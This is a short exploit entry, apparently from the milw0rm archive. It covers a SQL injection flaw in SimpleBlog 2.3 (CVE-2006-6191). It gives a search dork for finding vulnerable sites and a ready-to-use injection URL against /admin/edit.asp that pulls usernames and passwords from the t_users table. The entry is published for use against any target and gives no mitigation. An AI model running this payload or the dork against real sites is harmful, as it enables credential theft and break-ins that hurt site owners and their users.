SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection

Related Vulnerabilities: CVE-2006-6191  
Publish Date: 26 Nov 2006
Author: bolivar
                							

                # Title   :  simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author  :  bolivar
# Dork    :  "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

# milw0rm.com [2006-11-26]